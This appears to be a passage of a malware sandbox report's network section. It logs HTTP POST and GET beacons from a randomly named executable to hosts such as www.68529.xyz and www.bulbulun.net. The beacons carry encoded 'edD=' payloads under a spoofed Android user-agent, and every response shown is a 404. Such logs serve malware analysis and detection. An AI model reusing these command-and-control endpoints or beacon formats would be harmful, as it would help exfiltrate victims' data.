                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                39192.168.2.849747107.163.130.253805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:36.359710932 CET1706OUTPOST /2su7/ HTTP/1.1
                                                                                                                                Host: www.68529.xyz
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.68529.xyz
                                                                                                                                Referer: http://www.68529.xyz/2su7/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6b 59 4f 51 64 59 34 4e 6d 39 4e 31 49 62 41 67 7a 5a 64 32 43 61 6f 4d 59 69 78 2f 67 32 4d 6b 73 64 6d 62 74 6b 50 57 7a 6d 38 58 64 78 4c 58 2f 6e 69 62 33 77 57 6f 51 41 7a 42 38 34 74 34 53 46 59 4b 67 6f 6c 6f 45 77 39 51 39 6c 75 4a 64 43 45 35 52 43 70 39 6c 52 48 59 48 31 39 53 72 70 71 55 50 47 58 59 36 31 72 67 4f 50 56 64 57 56 56 2b 42 30 71 6d 37 72 57 67 75 74 53 45 7a 77 4a 6c 65 2f 6a 76 79 64 61 4a 47 53 67 33 36 4c 66 4d 50 56 68 2f 66 52 5a 45 57 66 6e 70 47 31 4c 71 4d 6e 56 32 54 58 6f 46 5a 39 2f 76 76 79 58 32 6e 74 69 69 65 46 47 50 74 42 32 45 4e 71 6c 71 37 41 4f 6a 4b 50 37 4a 54 32 32 56 6f 46 4a 62 5a 64 44 7a 5a 4e 4d 48 49 4b 6d 46 49 51 6e 6b 34 69 2f 50 6a 50 6f 77 34 45 34 59 6b 7a 53 6e 50 64 41 52 46 65 44 2b 77 62 69 69 6d 45 4b 4c 4a 68 77 6c 70 6d 63 6a 34 78 4f 68 2b 42 54 45 59 6d 4b 54 70 78 47 74 64 53 59 4e 6e 4a 4e 33 61 52 41 43 58 43 2f 42 34 6b 4c 57 42 6c 42 5a 47 42 63 41 6c 70 73 58 65 55 38 37 6b 77 5a 52 5a 51 6a 62 65 36 48 74 66 75 [TRUNCATED]
                                                                                                                                Data Ascii: edD=kYOQdY4Nm9N1IbAgzZd2CaoMYix/g2MksdmbtkPWzm8XdxLX/nib3wWoQAzB84t4SFYKgoloEw9Q9luJdCE5RCp9lRHYH19SrpqUPGXY61rgOPVdWVV+B0qm7rWgutSEzwJle/jvydaJGSg36LfMPVh/fRZEWfnpG1LqMnV2TXoFZ9/vvyX2ntiieFGPtB2ENqlq7AOjKP7JT22VoFJbZdDzZNMHIKmFIQnk4i/PjPow4E4YkzSnPdARFeD+wbiimEKLJhwlpmcj4xOh+BTEYmKTpxGtdSYNnJN3aRACXC/B4kLWBlBZGBcAlpsXeU87kwZRZQjbe6Htfu/IXBy6MJ4vWFoKQJlEj9QKL1Wg22XeqARXXQqzQ/b1yrpu3P0aTh2kQjcMWFbHs+baHPnvg/2ReUWK6qbx/WZIjVM9TPXzVuAUcDcnsW31zhURNzPaoxDd6p7jXQ/NfEvQ2xmDJ6fKtN4D/MhtsQSrvK2EoRWECcMNdeLgn2dTshJIIzd/0bcvvrLk+OOIiNyNYXVxOXxauXn1nN8+04bEsY5WeaKUo3WLhM2C0GOC2kvy31ulAVBz3ATUlwqqjtuBT2gQxRFdqAw6eJjDlSDZ1shpMhd00N1PTlki/dnTGx+jFZPJOarJYXIPD4+Mqat7GVV9IGiN1PVHCRarUb7Kuet8F5yI7Dg1KLRQ4D49CiGf318Ds4BNaKUDABwosocdp2Qhb/PjqyFmbS5jgSdp96mE9ytBSjjOkey2cF1ewsSOsSfIHM4PV5L8Jfer9EC1Ms9prXh33M2zcluHTT7VuhrjcYOX+Pi1wzBF2G0wsy4/qprRtQjxPGP8D4itySYutunevBrf6i2P9juL0B33GXBfd+IAwzUXr7093rOcdereb6klIhfBwcEmAmAWZlJxjV9tfOje3NKGIjfAZVuRlyKyuGC/UgNaXOaJXYHCUNyoCS2qO370aGOBwMTzbUkBVsARVSzw6tVb5VZZTZKqtfxckaz5gbfL [TRUNCATED]
                                                                                                                                Oct 29, 2024 16:56:37.280574083 CET691INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:37 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                40192.168.2.849748107.163.130.253805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:38.902292967 CET424OUTGET /2su7/?edD=pamwepkWr5FhGLIp9e9dE5wxTwNKoV0OitnUuyON/V0YdhH090qorkisWAKc74xRI1QLgpFLJyIK92bUXzceQHZBiR72PVsC64CKK1bLyHz9EtZqc0FSRzmTtcqhmMmMlg==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
                                                                                                                                Host: www.68529.xyz
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:56:39.833916903 CET691INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:39 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                41192.168.2.84974995.216.25.89805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:45.198911905 CET678OUTPOST /taxt/ HTTP/1.1
                                                                                                                                Host: www.bulbulun.net
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.bulbulun.net
                                                                                                                                Referer: http://www.bulbulun.net/taxt/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6d 33 67 4f 59 41 79 71 6b 34 49 5a 73 56 59 39 57 50 6c 2b 48 65 56 67 59 78 4a 47 63 6d 30 4e 2f 4f 2b 39 78 64 77 35 77 58 59 6b 4d 51 4c 2b 6c 7a 73 2b 6d 38 33 56 6c 4d 63 30 75 6c 69 55 6f 30 70 51 70 53 4b 4f 43 6a 66 70 46 56 5a 6d 4a 66 4d 68 43 58 71 37 46 57 74 37 6e 47 52 78 71 52 62 57 67 4b 79 76 4e 79 72 55 44 76 45 38 64 4b 44 6f 72 52 68 36 4d 4e 4a 38 61 31 50 6e 43 42 34 36 62 31 66 52 5a 72 6d 4b 34 4e 59 6d 34 65 4d 47 47 2f 4d 73 57 58 76 4c 79 7a 2f 6d 30 44 51 74 2f 54 6b 43 35 58 46 50 33 50 64 35 73 70 59 67 35 63 7a 4a 65 47 56 32 71 6b 30 65 68 2f 56 30 71 4c 55 3d
                                                                                                                                Data Ascii: edD=m3gOYAyqk4IZsVY9WPl+HeVgYxJGcm0N/O+9xdw5wXYkMQL+lzs+m83VlMc0uliUo0pQpSKOCjfpFVZmJfMhCXq7FWt7nGRxqRbWgKyvNyrUDvE8dKDorRh6MNJ8a1PnCB46b1fRZrmK4NYm4eMGG/MsWXvLyz/m0DQt/TkC5XFP3Pd5spYg5czJeGV2qk0eh/V0qLU=
                                                                                                                                Oct 29, 2024 16:56:46.061676979 CET360INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:45 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                42192.168.2.84975095.216.25.89805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:47.754036903 CET698OUTPOST /taxt/ HTTP/1.1
                                                                                                                                Host: www.bulbulun.net
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.bulbulun.net
                                                                                                                                Referer: http://www.bulbulun.net/taxt/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6d 33 67 4f 59 41 79 71 6b 34 49 5a 75 32 51 39 51 76 5a 2b 46 2b 56 6a 45 42 4a 47 4a 57 30 4a 2f 4f 36 39 78 66 63 70 77 46 38 6b 4d 78 37 2b 30 48 59 2b 6e 38 33 56 39 38 63 31 6a 46 69 66 6f 30 6c 59 70 58 69 4f 43 67 6a 70 46 51 31 6d 4a 6f 34 69 43 48 71 35 45 6d 74 31 6f 6d 52 78 71 52 62 57 67 4b 33 49 4e 32 2f 55 41 66 30 38 63 6f 37 33 68 78 68 35 4a 4e 4a 38 65 31 4f 75 43 42 35 58 62 78 58 2f 5a 74 36 4b 34 4d 49 6d 34 50 4d 48 50 2f 4d 75 4a 6e 75 34 7a 52 33 72 33 43 45 4d 68 67 67 32 6e 78 4a 47 32 35 73 54 32 4c 51 6d 36 63 62 69 65 46 39 41 76 54 70 32 37 63 46 45 30 63 41 31 38 74 37 6a 53 78 71 71 45 51 50 4c 62 51 76 6e 34 36 6b 39
                                                                                                                                Data Ascii: edD=m3gOYAyqk4IZu2Q9QvZ+F+VjEBJGJW0J/O69xfcpwF8kMx7+0HY+n83V98c1jFifo0lYpXiOCgjpFQ1mJo4iCHq5Emt1omRxqRbWgK3IN2/UAf08co73hxh5JNJ8e1OuCB5XbxX/Zt6K4MIm4PMHP/MuJnu4zR3r3CEMhgg2nxJG25sT2LQm6cbieF9AvTp27cFE0cA18t7jSxqqEQPLbQvn46k9
                                                                                                                                Oct 29, 2024 16:56:48.637900114 CET360INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:48 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                43192.168.2.84975195.216.25.89805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:50.294167042 CET1715OUTPOST /taxt/ HTTP/1.1
                                                                                                                                Host: www.bulbulun.net
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.bulbulun.net
                                                                                                                                Referer: http://www.bulbulun.net/taxt/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6d 33 67 4f 59 41 79 71 6b 34 49 5a 75 32 51 39 51 76 5a 2b 46 2b 56 6a 45 42 4a 47 4a 57 30 4a 2f 4f 36 39 78 66 63 70 77 46 30 6b 4d 6a 7a 2b 6d 57 59 2b 67 38 33 56 30 63 63 77 6a 46 69 43 6f 77 4a 63 70 58 6d 34 43 6d 76 70 66 79 39 6d 4c 64 55 69 4a 48 71 35 50 47 74 34 6e 47 52 67 71 52 4c 61 67 4b 6e 49 4e 32 2f 55 41 5a 51 38 59 36 44 33 79 68 68 36 4d 4e 4a 34 61 31 50 48 43 42 77 69 62 78 54 42 61 65 69 4b 34 73 34 6d 37 39 6b 48 41 2f 4d 6f 4b 6e 75 67 7a 52 71 72 33 43 6f 32 68 6a 39 6a 6e 32 46 47 32 38 78 62 76 49 6b 65 74 63 33 49 51 30 6c 52 33 77 46 75 79 74 78 50 77 65 63 51 7a 36 66 76 62 43 53 33 49 77 61 36 4d 56 76 6f 32 66 5a 74 4c 6d 49 67 7a 68 54 59 2f 61 46 7a 67 67 68 38 76 52 4c 4e 4e 76 6b 71 4a 36 37 47 44 57 53 79 55 51 53 31 39 61 41 52 4e 47 72 75 41 63 45 6e 50 63 39 38 62 79 2f 43 4d 67 6e 36 77 57 74 53 73 58 6d 67 4e 41 33 34 39 54 4d 5a 69 61 7a 74 43 6d 30 58 49 32 62 66 62 59 43 51 37 77 51 65 49 46 32 59 45 71 77 67 76 71 4c 54 4a 62 6e 46 2f 4b [TRUNCATED]
                                                                                                                                Data Ascii: edD=m3gOYAyqk4IZu2Q9QvZ+F+VjEBJGJW0J/O69xfcpwF0kMjz+mWY+g83V0ccwjFiCowJcpXm4Cmvpfy9mLdUiJHq5PGt4nGRgqRLagKnIN2/UAZQ8Y6D3yhh6MNJ4a1PHCBwibxTBaeiK4s4m79kHA/MoKnugzRqr3Co2hj9jn2FG28xbvIketc3IQ0lR3wFuytxPwecQz6fvbCS3Iwa6MVvo2fZtLmIgzhTY/aFzggh8vRLNNvkqJ67GDWSyUQS19aARNGruAcEnPc98by/CMgn6wWtSsXmgNA349TMZiaztCm0XI2bfbYCQ7wQeIF2YEqwgvqLTJbnF/KzU4Tq75Ercc/2APVRatnYbuWFPN5D5PET70XEDtWkpRFi31ZxVfUUtsIIq1BzpZ5Cay3xXayvRm3ob6tzAeUUNJXHLIh0447geXuP7XrcBxoIxBSy5KggX/NuBeU8EPyJdp9REH+DiwDIwjO0IibaZmhm+1czXT9zMR7Yeo2WGznNQff5BAoac+NiWTKBKDHpbkSMbz3sRltvvIlNYxi8NKyzn6dH4RvY98SZSk5NluD6bp/Awhx/wIXnZRGc9lTb3SCF7GBQ1Tojvh0UyoQIyBEJUWbz6mlpKksjQOIprhnCK+BnhSr5bzlWzC8r/gduOekSI4J9WhPBQi8v9Mk/hFczVAVrjAr1VfcX/mBia7KH1Pn1u+J3QW+Yfz1LdVt2SpIORSdVpOaMAw9/wYS1sMGyzrVxwA2CmM0s8o8Ts4dZfnAHBKsKwy7CKnYM8z+8RrxgwgK6pPWc6ZN50Y+bktjoJS+lCUv+GAnD1TVXaQW6QRekR7xp+Cjdo8Plzg1hyOxCkkfOm8Eyt3roKaQROTlVsY3LCSgODt380vT07ty5YkHcxkN/7GfG47D/etI8Up1F0qP1q6vy8sPqoW2v3r9lvb3LVdU0ZC/DV7HLDPXp8Bx16YRjJSuA2vgjKsJ3vorVZepg9xQIsATT0LX37qpiCsBOehw2c [TRUNCATED]
                                                                                                                                Oct 29, 2024 16:56:51.149471998 CET360INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:51 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                44192.168.2.84975295.216.25.89805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:52.841475964 CET427OUTGET /taxt/?edD=r1Iubw6Wh8IGmXw0YJVaMoRCD3peRXEmz6ievL1zkHtXMQX/g3sK5IHJ6rQ7ggOc23QC6zmWJBnuHS8GGugfDzOdB1VYvGABqxLnspqtMyj1CdMgVpHhi3ZxRPJaa26iDA==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
                                                                                                                                Host: www.bulbulun.net
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:56:53.693489075 CET360INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:53 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                45192.168.2.8497533.33.130.190805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
